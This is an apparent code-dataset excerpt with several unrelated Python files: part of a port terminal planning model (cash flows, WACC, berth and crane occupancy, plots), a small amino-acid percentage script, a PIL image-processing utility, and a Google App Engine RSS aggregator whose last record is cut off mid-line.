= station.unit_rate\n mobilisation = station.mobilisation\n station.capex = int(unit_rate + mobilisation)\n\n # - opex\n station.insurance = unit_rate * station.insurance_perc\n station.maintenance = unit_rate * station.maintenance_perc\n\n # labour\n labour = Labour(**agribulk_defaults.labour_data)\n station.shift = ((station.crew * self.operational_hours) / (labour.shift_length * labour.annual_shifts))\n station.labour = station.shift * labour.operational_salary\n\n if year == self.startyear:\n station.year_online = year + station.delivery_time + 1\n else:\n station.year_online = year + station.delivery_time\n\n # add cash flow information to quay_wall object in a dataframe\n station = self.add_cashflow_data_to_element(station)\n\n self.elements.append(station)\n\n station_occupancy_planned, station_occupancy_online = self.calculate_station_occupancy(year)\n\n # *** Financial analyses\n\n def add_cashflow_elements(self):\n\n cash_flows = pd.DataFrame()\n labour = Labour(**agribulk_defaults.labour_data)\n\n # initialise cash_flows\n cash_flows['year'] = list(range(self.startyear, self.startyear + self.lifecycle))\n cash_flows['capex'] = 0\n cash_flows['maintenance'] = 0\n cash_flows['insurance'] = 0\n cash_flows['energy'] = 
0\n cash_flows['labour'] = 0\n cash_flows['demurrage'] = self.demurrage\n cash_flows['revenues'] = self.revenues\n\n # add labour component for years where revenues are not zero\n cash_flows.loc[cash_flows[\n 'revenues'] != 0, 'labour'] = labour.international_staff * labour.international_salary + labour.local_staff * labour.local_salary\n\n for element in self.elements:\n if hasattr(element, 'df'):\n for column in cash_flows.columns:\n if column in element.df.columns and column != \"year\":\n cash_flows[column] += element.df[column]\n\n cash_flows = cash_flows.fillna(0)\n\n # calculate WACC real cashflows\n cash_flows_WACC_real = pd.DataFrame()\n cash_flows_WACC_real['year'] = cash_flows['year']\n for year in range(self.startyear, self.startyear + self.lifecycle):\n for column in cash_flows.columns:\n if column != \"year\":\n cash_flows_WACC_real.loc[cash_flows_WACC_real['year'] == year, column] = \\\n cash_flows.loc[\n cash_flows[\n 'year'] == year, column] / (\n (1 + self.WACC_real()) ** (\n year - self.startyear))\n\n return cash_flows, cash_flows_WACC_real\n\n def add_cashflow_data_to_element(self, element):\n\n \"\"\"Place cashflow data in element dataframe\"\"\"\n\n # years\n years = list(range(self.startyear, self.startyear + self.lifecycle))\n\n # capex\n capex = element.capex\n\n # opex\n maintenance = element.maintenance\n insurance = element.insurance\n labour = element.labour\n\n # year online\n year_online = element.year_online\n year_delivery = element.delivery_time\n\n df = pd.DataFrame()\n\n # years\n df[\"year\"] = years\n\n # capex: spread over the delivery period (60/40 split when delivery takes more than a year)\n if year_delivery > 1:\n df.loc[df[\"year\"] == year_online - 2, \"capex\"] = 0.6 * capex\n df.loc[df[\"year\"] == year_online - 1, \"capex\"] = 0.4 * capex\n else:\n df.loc[df[\"year\"] == year_online - 1, \"capex\"] = capex\n\n # opex\n if maintenance:\n df.loc[df[\"year\"] >= year_online, \"maintenance\"] = maintenance\n if insurance:\n df.loc[df[\"year\"] >= year_online, \"insurance\"] = insurance\n if labour:\n df.loc[df[\"year\"] >= year_online, \"labour\"] = labour\n\n df.fillna(0, inplace=True)\n\n element.df = df\n\n return element\n\n def WACC_nominal(self, Gearing=60, Re=.10, Rd=.30, Tc=.28):\n \"\"\"Nominal cash flow is the true dollar amount of future revenues the company expects\n to receive and expenses it expects to pay out, including inflation.\n Use WACC_nominal when all cashflows within the model are denoted in real terms and include inflation.\"\"\"\n\n # Re: return on equity, Rd: return on debt, Tc: income tax rate\n E = 100 - Gearing\n D = Gearing\n\n WACC_nominal = ((E / (E + D)) * Re + (D / (E + D)) * Rd) * (1 - Tc)\n\n return WACC_nominal\n\n
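 # worked example with the default arguments: WACC_nominal = (0.4 * 0.10 + 0.6 * 0.30) * (1 - 0.28) = 0.1584;\n # deflating by 2% inflation then gives WACC_real = 1.1584 / 1.02 - 1, roughly 0.136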
 def WACC_real(self, inflation=0.02): # old: interest=0.0604\n \"\"\"Real cash flow expresses a company's cash flow with adjustments for inflation.\n When all cashflows within the model are denoted in real terms and have been\n adjusted for inflation (no inflation has been taken into account),\n WACC_real should be used. WACC_real is computed as follows:\"\"\"\n\n WACC_real = (self.WACC_nominal() + 1) / (inflation + 1) - 1\n\n return WACC_real\n\n def NPV(self):\n \"\"\"Gather data from Terminal elements and combine into a cash flow plot\"\"\"\n\n # add cash flow information for each of the Terminal elements\n cash_flows, cash_flows_WACC_real = self.add_cashflow_elements()\n\n # prepare years, revenue, capex and opex for plotting\n years = cash_flows_WACC_real['year'].values\n revenue = self.revenues\n capex = cash_flows_WACC_real['capex'].values\n opex = cash_flows_WACC_real['insurance'].values + \\\n cash_flows_WACC_real['maintenance'].values + \\\n cash_flows_WACC_real['energy'].values + \\\n cash_flows_WACC_real['demurrage'].values + \\\n cash_flows_WACC_real['labour'].values\n\n PV = - capex - opex + revenue\n print('PV: {}'.format(PV))\n\n print('NPV: {}'.format(np.sum(PV)))\n\n # *** General functions\n\n def find_elements(self, obj):\n \"\"\"return elements of type obj that are part of self.elements\"\"\"\n\n list_of_elements = []\n if self.elements != []:\n for element in self.elements:\n if isinstance(element, obj):\n list_of_elements.append(element)\n\n return list_of_elements\n\n def calculate_vessel_calls(self, year=2019):\n \"\"\"Calculate volumes to be transported and the number of vessel calls (both per vessel type and in total) \"\"\"\n\n # initialize values to be returned\n handysize_vol = 0\n handymax_vol = 0\n panamax_vol = 0\n total_vol = 0\n\n # gather volumes from each commodity scenario and calculate how much is transported with which vessel\n commodities = self.find_elements(Commodity)\n for commodity in commodities:\n try:\n volume = commodity.scenario_data.loc[commodity.scenario_data['year'] == year]['volume'].item()\n handysize_vol += volume * commodity.handysize_perc / 100\n handymax_vol += volume * commodity.handymax_perc / 100\n panamax_vol += volume * commodity.panamax_perc / 100\n total_vol += volume\n except:\n pass\n\n # gather vessels and calculate the number of calls each vessel type needs to make\n vessels = self.find_elements(Vessel)\n for vessel in vessels:\n if vessel.type == 'Handysize':\n handysize_calls = int(np.ceil(handysize_vol / vessel.call_size))\n elif vessel.type == 'Handymax':\n handymax_calls = int(np.ceil(handymax_vol / vessel.call_size))\n elif vessel.type == 'Panamax':\n panamax_calls = int(np.ceil(panamax_vol / vessel.call_size))\n total_calls = np.sum([handysize_calls, handymax_calls, panamax_calls])\n\n return handysize_calls, handymax_calls, panamax_calls, total_calls, total_vol\n\n def calculate_berth_occupancy(self, year, handysize_calls, handymax_calls, panamax_calls):\n \"\"\"\n - Find all cranes and sum their effective_capacity to get service_capacity\n - Divide callsize_per_vessel by service_capacity and add mooring time to get total time at berth\n - Occupancy is total_time_at_berth divided by operational hours\n \"\"\"\n\n # list all crane objects in system\n list_of_elements_1 = self.find_elements(Cyclic_Unloader)\n list_of_elements_2 = self.find_elements(Continuous_Unloader)\n list_of_elements = list_of_elements_1 + list_of_elements_2\n\n # find the total service rate and determine the time at berth (in hours, per vessel type and in total)\n service_rate_planned = 0\n service_rate_online = 0\n if list_of_elements != []:\n for element in list_of_elements:\n service_rate_planned += element.effective_capacity\n if year >= element.year_online:\n service_rate_online += element.effective_capacity\n\n # estimate berth occupancy\n 
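# e.g. (hypothetical figures): one crane at 1000 t/h serving a 70000 t panamax call\n # with 6 h of mooring time keeps the berth occupied for roughly 76 h\n 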
time_at_berth_handysize_planned = handysize_calls * (\n (agribulk_defaults.handysize_data[\"call_size\"] / service_rate_planned) + agribulk_defaults.handysize_data[\n \"mooring_time\"])\n time_at_berth_handymax_planned = handymax_calls * (\n (agribulk_defaults.handymax_data[\"call_size\"] / service_rate_planned) + agribulk_defaults.handymax_data[\n \"mooring_time\"])\n time_at_berth_panamax_planned = panamax_calls * (\n (agribulk_defaults.panamax_data[\"call_size\"] / service_rate_planned) + agribulk_defaults.panamax_data[\"mooring_time\"])\n\n total_time_at_berth_planned = np.sum(\n [time_at_berth_handysize_planned, time_at_berth_handymax_planned, time_at_berth_panamax_planned])\n\n # berth_occupancy is the total time at berth divided by the operational hours\n berth_occupancy_planned = total_time_at_berth_planned / self.operational_hours\n\n # estimate crane occupancy\n time_at_crane_handysize_planned = handysize_calls * (\n (agribulk_defaults.handysize_data[\"call_size\"] / service_rate_planned))\n time_at_crane_handymax_planned = handymax_calls * (\n (agribulk_defaults.handymax_data[\"call_size\"] / service_rate_planned))\n time_at_crane_panamax_planned = panamax_calls * (\n (agribulk_defaults.panamax_data[\"call_size\"] / service_rate_planned))\n\n total_time_at_crane_planned = np.sum(\n [time_at_crane_handysize_planned, time_at_crane_handymax_planned, time_at_crane_panamax_planned])\n\n # crane_occupancy is the total time at the cranes divided by the operational hours\n crane_occupancy_planned = total_time_at_crane_planned / self.operational_hours\n\n if service_rate_online != 0:\n time_at_berth_handysize_online = handysize_calls * (\n (agribulk_defaults.handysize_data[\"call_size\"] / service_rate_online) + agribulk_defaults.handysize_data[\n \"mooring_time\"])\n time_at_berth_handymax_online = handymax_calls * (\n (agribulk_defaults.handymax_data[\"call_size\"] / service_rate_online) + agribulk_defaults.handymax_data[\n \"mooring_time\"])\n time_at_berth_panamax_online = panamax_calls * (\n (agribulk_defaults.panamax_data[\"call_size\"] / service_rate_online) + agribulk_defaults.panamax_data[\n \"mooring_time\"])\n\n total_time_at_berth_online = np.sum(\n [time_at_berth_handysize_online, time_at_berth_handymax_online, time_at_berth_panamax_online])\n\n # berth_occupancy is the total time at berth divided by the operational hours (capped at 1)\n berth_occupancy_online = min([total_time_at_berth_online / self.operational_hours, 1])\n\n time_at_crane_handysize_online = handysize_calls * (\n (agribulk_defaults.handysize_data[\"call_size\"] / service_rate_online))\n time_at_crane_handymax_online = handymax_calls * (\n (agribulk_defaults.handymax_data[\"call_size\"] / service_rate_online))\n time_at_crane_panamax_online = panamax_calls * (\n (agribulk_defaults.panamax_data[\"call_size\"] / service_rate_online))\n\n total_time_at_crane_online = np.sum(\n [time_at_crane_handysize_online, time_at_crane_handymax_online, time_at_crane_panamax_online])\n\n # crane_occupancy is the total time at the cranes divided by the operational hours (capped at 1)\n crane_occupancy_online = min([total_time_at_crane_online / self.operational_hours, 1])\n\n else:\n berth_occupancy_online = float(\"inf\")\n crane_occupancy_online = float(\"inf\")\n\n else:\n # if there are no cranes the berth occupancy is 'infinite' so a berth is certainly needed\n berth_occupancy_planned = float(\"inf\")\n berth_occupancy_online = float(\"inf\")\n crane_occupancy_planned = float(\"inf\")\n crane_occupancy_online = float(\"inf\")\n\n return berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online\n\n
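 # e.g. with 2 berths at an online occupancy of 0.5, the 4th order polynomial below gives\n # factor = 29.825 * 0.0625 - 46.489 * 0.125 + 25.656 * 0.25 - 5.3517 * 0.5 + 0.3376, about 0.13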
 def waiting_time(self, year):\n \"\"\"\n - Look up the berth occupancy for the given year\n - Find the factor for the waiting time with the E2/E/n queueing theory using 4th order polynomial regression\n - Waiting time is the factor times the crane occupancy\n \"\"\"\n\n handysize_calls, handymax_calls, panamax_calls, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize_calls, handymax_calls, panamax_calls)\n\n # find the different factors which are linked to the number of berths\n berths = len(self.find_elements(Berth))\n\n if berths == 1:\n factor = max(0,\n 79.726 * berth_occupancy_online ** 4 - 126.47 * berth_occupancy_online ** 3 + 70.660 * berth_occupancy_online ** 2 - 14.651 * berth_occupancy_online + 0.9218)\n elif berths == 2:\n factor = max(0,\n 29.825 * berth_occupancy_online ** 4 - 46.489 * berth_occupancy_online ** 3 + 25.656 * berth_occupancy_online ** 2 - 5.3517 * berth_occupancy_online + 0.3376)\n elif berths == 3:\n factor = max(0,\n 19.362 * berth_occupancy_online ** 4 - 30.388 * berth_occupancy_online ** 3 + 16.791 * berth_occupancy_online ** 2 - 3.5457 * berth_occupancy_online + 0.2253)\n elif berths == 4:\n factor = max(0,\n 17.334 * berth_occupancy_online ** 4 - 27.745 * berth_occupancy_online ** 3 + 15.432 * berth_occupancy_online ** 2 - 3.2725 * berth_occupancy_online + 0.2080)\n elif berths == 5:\n factor = max(0,\n 11.149 * berth_occupancy_online ** 4 - 17.339 * berth_occupancy_online ** 3 + 9.4010 * berth_occupancy_online ** 2 - 1.9687 * berth_occupancy_online + 0.1247)\n elif berths == 6:\n factor = max(0,\n 10.512 * berth_occupancy_online ** 4 - 16.390 * berth_occupancy_online ** 3 + 8.8292 * berth_occupancy_online ** 2 - 1.8368 * berth_occupancy_online + 0.1158)\n elif berths == 7:\n factor = max(0,\n 8.4371 * berth_occupancy_online ** 4 - 13.226 * berth_occupancy_online ** 3 + 7.1446 * berth_occupancy_online ** 2 - 1.4902 * berth_occupancy_online + 0.0941)\n else:\n # if there are no berths the occupancy is 'infinite' so a berth is certainly needed\n factor = float(\"inf\")\n\n waiting_time_hours = factor * crane_occupancy_online * self.operational_hours / total_calls\n waiting_time_occupancy = waiting_time_hours * total_calls / self.operational_hours\n\n return factor, waiting_time_occupancy\n\n def calculate_station_occupancy(self, year):\n \"\"\"\n - Find all stations and sum their service_rate to get service_capacity in tons per hour\n - Divide the throughput by the service rate to get the total hours in a year\n - Occupancy is total_time_at_station divided by operational hours\n \"\"\"\n\n list_of_elements = self.find_elements(Unloading_station)\n # find the total service rate and determine the time at station\n\n service_rate_planned = 0\n service_rate_online = 0\n if list_of_elements != []:\n for element in list_of_elements:\n service_rate_planned += element.service_rate\n if year >= element.year_online:\n service_rate_online += element.service_rate\n\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n\n # find the total throughput\n service_rate_throughput = 0\n for element in (self.find_elements(Cyclic_Unloader) + 
self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate_throughput += element.effective_capacity * crane_occupancy_online\n\n time_at_station_planned = service_rate_throughput * self.operational_hours / service_rate_planned # element.service_rate\n\n # station_occupancy is the total time at station divided by the operational hours\n station_occupancy_planned = time_at_station_planned / self.operational_hours\n\n if service_rate_online != 0:\n time_at_station_online = service_rate_throughput * self.operational_hours / service_rate_online # element.capacity\n\n # station occupancy is the total time at station divided by the operational hours\n station_occupancy_online = min([time_at_station_online / self.operational_hours, 1])\n else:\n station_occupancy_online = float(\"inf\")\n\n else:\n # if there are no cranes the berth occupancy is 'infinite' so a berth is certainly needed\n station_occupancy_planned = float(\"inf\")\n station_occupancy_online = float(\"inf\")\n\n return station_occupancy_planned, station_occupancy_online\n\n def check_crane_slot_available(self):\n list_of_elements = self.find_elements(Berth)\n slots = 0\n for element in list_of_elements:\n slots += element.max_cranes\n\n list_of_elements_1 = self.find_elements(Cyclic_Unloader)\n list_of_elements_2 = self.find_elements(Continuous_Unloader)\n list_of_elements = list_of_elements_1 + list_of_elements_2\n\n # when there are more slots than installed cranes ...\n if slots > len(list_of_elements):\n return True\n else:\n return False\n\n def report_element(self, Element, year):\n elements = 0\n elements_online = 0\n element_name = []\n list_of_elements = self.find_elements(Element)\n if list_of_elements != []:\n for element in list_of_elements:\n element_name = element.name\n elements += 1\n if year >= element.year_online:\n elements_online += 1\n\n if self.debug:\n print(' a total of {} {} is online; {} total planned'.format(elements_online, element_name, elements))\n\n return elements_online, elements\n\n def train_call(self, year):\n \"\"\"Calculation of the train calls per year, this is calculated from:\n - find out how much throughput there is\n - find out how much cargo the train can transport\n - calculate the numbers of train calls\"\"\"\n\n station = Unloading_station(**agribulk_defaults.hinterland_station_data)\n\n # - Trains calculated with the throughput\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n\n service_rate_throughput = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate_throughput += element.effective_capacity * crane_occupancy_online\n\n train_calls = service_rate_throughput * self.operational_hours / station.call_size\n\n return train_calls\n\n # *** plotting functions\n\n def terminal_elements_plot(self, width=0.1, alpha=0.6):\n \"\"\"Gather data from Terminal and plot which elements come online when\"\"\"\n\n # collect elements to add to plot\n years = []\n berths = []\n cranes = []\n quays = []\n conveyors_quay = []\n storages = []\n conveyors_hinterland = []\n unloading_station = []\n\n for year in range(self.startyear, self.startyear + self.lifecycle):\n years.append(year)\n berths.append(0)\n quays.append(0)\n cranes.append(0)\n conveyors_quay.append(0)\n 
storages.append(0)\n conveyors_hinterland.append(0)\n unloading_station.append(0)\n\n for element in self.elements:\n if isinstance(element, Berth):\n if year >= element.year_online:\n berths[-1] += 1\n if isinstance(element, Quay_wall):\n if year >= element.year_online:\n quays[-1] += 1\n if isinstance(element, Cyclic_Unloader) | isinstance(element, Continuous_Unloader):\n if year >= element.year_online:\n cranes[-1] += 1\n if isinstance(element, Conveyor_Quay):\n if year >= element.year_online:\n conveyors_quay[-1] += 1\n if isinstance(element, Storage):\n if year >= element.year_online:\n storages[-1] += 1\n if isinstance(element, Conveyor_Hinter):\n if year >= element.year_online:\n conveyors_hinterland[-1] += 1\n if isinstance(element, Unloading_station):\n if year >= element.year_online:\n unloading_station[-1] += 1\n\n # generate plot\n fig, ax = plt.subplots(figsize=(20, 10))\n\n ax.bar([x + 0 * width for x in years], berths, width=width, alpha=alpha, label=\"berths\", color='coral',\n edgecolor='crimson')\n ax.bar([x + 1 * width for x in years], quays, width=width, alpha=alpha, label=\"quays\", color='orchid',\n edgecolor='purple')\n ax.bar([x + 2 * width for x in years], cranes, width=width, alpha=alpha, label=\"cranes\", color='lightblue',\n edgecolor='blue')\n ax.bar([x + 3 * width for x in years], conveyors_quay, width=width, alpha=alpha, label=\"conveyors quay\",\n color='lightgreen', edgecolor='green')\n ax.bar([x + 4 * width for x in years], storages, width=width, alpha=alpha, label=\"storages\", color='orange',\n edgecolor='orangered')\n ax.bar([x + 5 * width for x in years], conveyors_hinterland, width=width, alpha=alpha, label=\"conveyors hinter\",\n color='grey', edgecolor='black')\n ax.bar([x + 6 * width for x in years], unloading_station, width=width, alpha=alpha, label=\"unloading station\",\n color='red', edgecolor='black')\n\n ax.set_xlabel('Years')\n ax.set_ylabel('Elements on line [nr]')\n ax.set_title('Terminal elements online ({})'.format(self.crane_type_defaults['crane_type']))\n ax.set_xticks([x for x in years])\n ax.set_xticklabels(years)\n ax.legend()\n\n def terminal_capacity_plot(self, width=0.25, alpha=0.6):\n \"\"\"Gather data from Terminal and plot which elements come online when\"\"\"\n\n # get crane service capacity and storage capacity\n years = []\n cranes = []\n cranes_capacity = []\n storages = []\n storages_capacity = []\n\n for year in range(self.startyear, self.startyear + self.lifecycle):\n\n years.append(year)\n cranes.append(0)\n cranes_capacity.append(0)\n storages.append(0)\n storages_capacity.append(0)\n\n handysize_calls, handymax_calls, panamax_calls, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize_calls, handymax_calls, panamax_calls)\n\n for element in self.elements:\n if isinstance(element, Cyclic_Unloader) | isinstance(element, Continuous_Unloader):\n # calculate cranes service capacity: effective_capacity * operational hours * berth_occupancy?\n if year >= element.year_online:\n cranes[-1] += 1\n cranes_capacity[\n -1] += element.effective_capacity * self.operational_hours * crane_occupancy_online\n if isinstance(element, Storage):\n if year >= element.year_online:\n storages[-1] += 1\n storages_capacity[-1] += element.capacity * 365 / 18\n\n # get demand\n demand = pd.DataFrame()\n demand['year'] = list(range(self.startyear, self.startyear + self.lifecycle))\n 
demand['demand'] = 0\n for commodity in self.find_elements(Commodity):\n try:\n for column in commodity.scenario_data.columns:\n if column in commodity.scenario_data.columns and column != \"year\":\n demand['demand'] += commodity.scenario_data[column]\n except:\n pass\n # generate plot\n fig, ax = plt.subplots(figsize=(20, 10))\n\n ax.bar([x - 0.5 * width for x in years], cranes_capacity, width=width, alpha=alpha, label=\"cranes capacity\",\n color='red')\n # ax.bar([x + 0.5 * width for x in years], storages_capacity, width=width, alpha=alpha, label=\"storages\",\n # color='green')\n ax.step(years, demand['demand'].values, label=\"demand\", where='mid')\n\n ax.set_xlabel('Years')\n ax.set_ylabel('Throughput capacity [tons/year]')\n ax.set_title('Terminal capacity online ({})'.format(self.crane_type_defaults['crane_type']))\n ax.set_xticks([x for x in years])\n ax.set_xticklabels(years)\n ax.legend()\n\n def cashflow_plot(self, cash_flows, width=0.3, alpha=0.6):\n \"\"\"Gather data from Terminal elements and combine into a cash flow plot\"\"\"\n\n # prepare years, revenue, capex and opex for plotting\n years = cash_flows['year'].values\n revenue = self.revenues\n capex = cash_flows['capex'].values\n opex = cash_flows['insurance'].values + cash_flows['maintenance'].values + cash_flows['energy'].values + \\\n cash_flows['labour'].values + cash_flows['demurrage'].values\n\n # sum cash flows to get profits as a function of year\n profits = []\n for year in years:\n profits.append(-cash_flows.loc[cash_flows['year'] == year]['capex'].item() -\n cash_flows.loc[cash_flows['year'] == year]['insurance'].item() -\n cash_flows.loc[cash_flows['year'] == year]['maintenance'].item() -\n cash_flows.loc[cash_flows['year'] == year]['energy'].item() -\n cash_flows.loc[cash_flows['year'] == year]['labour'].item() -\n cash_flows.loc[cash_flows['year'] == year]['demurrage'].item() +\n revenue[cash_flows.loc[cash_flows['year'] == year].index.item()])\n\n # cumulatively sum profits to get profits_cum\n profits_cum = [None] * len(profits)\n for index, value in enumerate(profits):\n if index == 0:\n profits_cum[index] = 0\n else:\n profits_cum[index] = profits_cum[index - 1] + profits[index]\n\n # generate plot\n fig, ax = plt.subplots(figsize=(16, 7))\n\n ax.bar([x - width for x in years], -opex, width=width, alpha=alpha, label=\"opex\", color='lightblue')\n ax.bar(years, -capex, width=width, alpha=alpha, label=\"capex\", color='red')\n ax.bar([x + width for x in years], revenue, width=width, alpha=alpha, label=\"revenue\", color='lightgreen')\n ax.step(years, profits, label='profits', where='mid')\n ax.step(years, profits_cum, label='profits_cum', where='mid')\n\n ax.set_xlabel('Years')\n ax.set_ylabel('Cashflow [000 M $]')\n ax.set_title('Cash flow plot')\n ax.set_xticks([x for x in years])\n ax.set_xticklabels(years)\n ax.legend()\n","sub_path":"opentisim/agribulk_system.py","file_name":"agribulk_system.py","file_ext":"py","file_size_in_byte":65837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"382156103","text":"#!/usr/bin/python3\n\ndef percentage(pro_seq,aa_residue=\"aILMFWYV\"):\n\taa_residue = list(aa_residue)\n\taalist_length = len(aa_residue)\n\taa_number = list(range(aalist_length))\n\tfor i in range(aalist_length): \n\t\taa_number[i] = pro_seq.upper().count(aa_residue[i].upper())\n\tpercentage = sum(aa_number)/len(pro_seq)*100\n\tprint(aa_number,percentage)\n\t\n#percentage(\"MSRSLLLRFLLFLLLLPPLP\",[\"M\"])\n#percentage(\"MSRSLLLRFLLFLLLLPPLP\", 
['F', 'S', 'L'])\n\npercentage(\"MSRSLLLRFLLFLLLLPPLP\")\n#assert round(percentage(\"MSRSLLLRFLLFLLLLPPLP\")) == 65\n","sub_path":"Lecture14/lecture14_ex02.py","file_name":"lecture14_ex02.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"122369230","text":"from PIL import Image,ImageFilter\n\ndef concat(out, Ins):\n #concat out/concat.png img/S.png img/A.png img/M.png img/P.png img/L.png img/E.png\n Images = [Image.open(path) for path in Ins]\n ws = map(lambda im:im.width,Images)\n d = Image.new(\"L\",(sum(ws),Images[0].height))\n w = 0\n for i in Images:\n d.paste(i,(w,0))\n w+=i.width\n d.save(out)\n\n\ndef rotate(out, rotation, In):\n # rotate out/rotate.png 90 img/A.png\n before = Image.open(In)\n after = before.rotate(-rotation)\n after.save(out)\n\ndef resize(out, ratio, In):\n # resize out/resize.png 0.5 img/B.png\n before = Image.open(In)\n w,h = before.size\n after = before.resize((int(w*ratio),int(h*ratio)))\n after.save(out)\n\ndef edge(out, In):\n # edge out/edge.png ./sample/sample.png\n img = Image.open(In)\n filtered = img.filter(ImageFilter.FIND_EDGES)\n filtered.save(out)\n\n\ndef main(argv):\n # This is a sample code to use arguments and outputs.\n # Edit and remove this code as you like.\n if argv[0] == \"concat\":\n concat(argv[1],argv[2:])\n elif argv[0] == \"rotate\":\n rotate(argv[1],int(argv[2]),argv[3])\n elif argv[0] == \"resize\":\n resize(argv[1],float(argv[2]),argv[3])\n elif argv[0] == \"edge\":\n edge(argv[1],argv[2])\n else:\n pass\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"611798002","text":"import fix_path\nimport webapp2 as webapp\nfrom google.appengine.api import urlfetch\nfrom google.appengine.api import taskqueue\nfrom google.appengine.ext import blobstore\nfrom google.appengine.api import images\nfrom google.appengine.api import files\nfrom google.appengine.api import memcache\nfrom apps import DEBUG\nfrom apps.models import *\nimport logging, yaml, re, datetime\nfrom feedparser import feedparser\nfrom readability.readability import Document\nfrom pyquery import PyQuery\n\n# Load feeds from a yaml file\nclass LoadFeedsHandler(webapp.RequestHandler):\n def get(self):\n \"\"\" Load feeds from data/feeds.yaml \"\"\"\n f = open('data/feeds.yaml', 'r')\n array = yaml.load(f)\n\n feeds = []\n for item in array:\n name = item['name']\n link = item['link']\n\n feed = Feed.all().filter('name =', name).get()\n if feed is None:\n feed = Feed(name=name, link=link, updated=datetime.datetime.now())\n else:\n feed.name = name\n feed.link = link\n feed.updated = datetime.datetime.now()\n\n feeds.append(feed)\n\n db.put(feeds)\n self.response.out.write('load-feeds: done')\n\n# Fetch and parse feeds\nclass UpdateFeedsHandler(webapp.RequestHandler):\n def get(self):\n for feed in Feed.all():\n taskqueue.add(queue_name='update-feeds', url='/aggregator/update-single-feed', params={'id': feed.key().id_or_name()}, method='GET')\n self.response.out.write('update-feeds: done')\n\n# Fetch and parse a single feed\nclass UpdateSingleFeedHandler(webapp.RequestHandler):\n def get(self):\n feedId = long(self.request.get('id'))\n feed = Feed.get_by_id(feedId)\n\n res = urlfetch.fetch(feed.link, deadline=20)\n data = feedparser.parse(res.content)\n feedUpdated = 
data['feed']['updated_parsed']\n feedUpdated = datetime.datetime(*feedUpdated[:6]) # convert `time.struct_time` into a `datetime.datetime` object\n\n if feedUpdated != feed.updated:\n toSave = []\n toFetch = []\n for entry in data.entries:\n # Skip empty entries\n if not hasattr(entry, 'summary'):\n continue\n\n articleUpdated = entry.updated_parsed\n articleUpdated = datetime.datetime(*articleUpdated[:6]) # convert `time.struct_time` into a `datetime.datetime` object\n summary = re.sub(r'<.*?>', '', entry.summary)\n summary = re.sub(r' ', '', summary)\n\n a = Article.all().filter(\"link =\", entry.link).get()\n if a is None:\n a = Article(title=entry.title, link=entry.link, feed=feed, updated=articleUpdated, summary=summary)\n toSave.append(a)\n toFetch.append(a)\n elif a.updated != articleUpdated:\n a.title = entry.title\n a.updated = articleUpdated\n a.summary = summary\n toSave.append(a)\n toFetch.append(a)\n\n feed.updated = feedUpdated\n toSave.append(feed)\n db.put(toSave)\n\n # Fetch full texts of articles\n for a in toFetch:\n taskqueue.add(queue_name='get-full-article', url='/aggregator/get-full-article', params={'link': a.link, 'id': a.key().id_or_name()}, method='GET')\n\n# Fetch full texts of articles\nclass GetFullArticleHandler(webapp.RequestHandler):\n def get(self):\n articleId = long(self.request.get('id'))\n article = Article.get_by_id(articleId)\n\n link = self.request.get('link')\n res = urlfetch.fetch(link, deadline=20)\n html = Document(res.content).summary()\n\n S = PyQuery(html)\n article.origImageUrl = S(\"img:first\").attr('src')\n article.imageUrl = None\n article.body = html\n article.put()\n\n if article.origImageUrl is not None and article.imageUrl is None:\n taskqueue.add(queue_name='upload-images', url='/aggregator/upload-article-image', params={'link': article.origImageUrl, 'id': articleId}, method='GET')\n\n self.response.out.write('OK')\n\n# Resize and cache thumbnails\nclass UploadArticleImageHandler(webapp.RequestHandler):\n def get(self):\n articleId = long(self.request.get('id'))\n article = Article.get_by_id(articleId)\n\n link = self.request.get('link')\n res = urlfetch.fetch(link, deadline=20)\n if res.status_code == 200:\n img = images.Image(res.content)\n\n if img.width < 100:\n article.origImageUrl = None\n article.imageUrl = None\n else:\n img.resize(width=150)\n img.im_feeling_lucky()\n imageData = img.execute_transforms(output_encoding=images.JPEG)\n\n # Create the file\n file_name = files.blobstore.create(mime_type='image/jpeg')\n\n # Open the file and write to it\n with files.open(file_name, 'a') as f:\n f.write(imageData)\n\n # Finalize the file. 
Do this before attempting to read it.\n files.finalize(file_name)\n\n # Get the file's blob key\n blob_key = files.blobstore.get_blob_key(file_name)\n\n # Save the blob key and image serving url in the Article\n article.imageBlob = blob_key\n article.imageUrl = images.get_serving_url(blob_key)\n\n article.put()\n self.response.out.write('OK')\n\n# Flush memcache\nclass FlushMemcacheHandler(webapp.RequestHandler):\n def get(self):\n memcache.flush_all()\n self.response.out.write('flush-memcache: done')\n\n# Purge old articles\nclass PurgeOldArticlesHandler(webapp.RequestHandler):\n def get(self):\n oneDayAgo = datetime.datetime.now() - datetime.timedelta(days=1)\n toDelete = []\n blobsToDelete = []\n\n for a in Article.all().filter(\"updated <\", oneDayAgo):\n toDelete.append(a)\n if a.imageBlob is not None:\n blobsToDelete.append(a.imageBlob.key())\n\n db.delete(toDelete)\n blobstore.delete(blobsToDelete)\n self.response.out.write('purge-old-articles: done')\n\n#\n# Application\n#\napp = webapp.WSGIApplication([\n (r'/aggregator/load-feeds', LoadFeedsHandler),\n (r'/aggregator/update-feeds', UpdateFeedsHandler),\n (r'/aggregator/update-single-feed', 